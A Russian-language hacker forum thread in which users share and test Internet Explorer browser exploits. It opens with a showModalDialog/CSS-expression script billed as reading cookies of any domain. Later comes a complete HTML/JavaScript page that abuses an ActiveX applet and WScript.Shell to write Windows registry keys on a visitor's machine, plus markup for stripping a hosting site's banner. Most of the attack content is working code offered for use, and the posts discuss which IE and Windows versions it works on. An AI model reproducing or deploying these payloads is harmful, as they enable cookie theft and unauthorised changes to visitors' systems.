с помощью этого скрипта можно получить доступ к cookies любого домена

<SCRIPT>
showModalDialog("http://forum.antichat.ru",null,"font-size:expression(window.execScript(unescape('alert% 28%22Domain%3A%22+document.domain+%22%5CnCookie%3A %22+document.cookie%29%3Bwindow.close%28%29%3B')))");
</SCRIPT>

взял с секлаба

Там в верху год пишется: 4 декабря 2002

да хоть 99-й

И у тебя он пашет???

хм.. пашет..

форум просто меняет код. вот в тхт если что

Да дело не в этом, просто в большинстве броузеров это не сработает ...
xp sp2 не пашет, на sp1 думаю тоже ...
ИМХО, только на IE ниже 5 версии (или 5, хз)

Надо проверить ...
хм.. пашет..
хехе, на тебе что не проверяй - все пашет ))

Работает в шестой версии, проверялось на XPSP1, ну и на Win 98)
да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE

да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE

Тут дело в изменениях в плане безопасности, появившихся во втором сервис паке + некоторые другие факторы, такие как наличие фаервола с фильтрацией интерактивных элементов, наличе, изменения каких-либо настроек (в частности отключение ActiveX ) и т.п. ...

Кстати, вот например эксплоит с переполнением буфера через <iframe> работает только на xp или xp sp1. Под 2k или sp2 он просто вешает осла, при этом никакие команды не выполняются.
Так что от ОС очень даже зависит ...

Ну почти.. я не то немного имел ввиду. Здесь именно такая уязвимость имхо
Вот ДоС или переполнения буфера зависят от ОС, а здесь уже не затрагивается движок проводника, а ошибка чисто в надстройках, поэтому и говорю. Ну если конечно рассматривать что в Sp входят патчи для Ie, то и от неё зависит. короче, ладно))

На XP SP2 IE6 - не работает...
При попытке задания expression в опциях пишет Bad argument

На 98-м (но с обнавлениями) с шестым ИЕ тоже не работает.
Завтра проверю на 98-х без обновлений и пятым ИЕ.
...
Если на то пошло (старье поднимаем) - также завтра притащю как при заходе на страницу в 98 (ИЕ5) реестр править. Причем - антивирусы (нортон и касперский) орут что там хрень какая-то, однако пропускают и можно редактировать ветки реестра (ну, или, сносить их).

Для 98-го. Правит реестр (добавляя при загрузке винды приветственную надпись).
...
<HTML><HEAD></HEAD><BODY>
<APPLET code=com.ms.activeX.ActiveXComponent height=0 width=0><PARAM NAME="code" VALUE="com.ms.activeX.ActiveXComponent"><PARAM NAME="height" VALUE="1"><PARAM NAME="width" VALUE="1"><PARAM NAME="codeBase" VALUE="http://www.antichat.ru"></APPLET>
<SCRIPT language=JAVASCRIPT>
<!--
InterfaceObject=document.applets[0];
setTimeout("Run()",1000);
function Run()
{
regkey = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Winlogon\\LegalNoticeCaption"
regparam = "Велкам!"
WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
InterfaceObject.setCLSID(WshShellClassID);
wshShell = InterfaceObject.createInstance();
wshShell.regwrite(regkey,regparam)
regkey = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Winlogon\\LegalNoticeText"
regparam = "Добро пожаловать на Античат | http://www.antichat.ru"
wshShell.regwrite(regkey,regparam)
}
-->
</SCRIPT></BODY></HTML><noscript><noscript><plaintext><plaintext>
...
p.s. в конце <noscript><noscript><plaintext><plaintext> это для "резки" банера на НАрод_Ру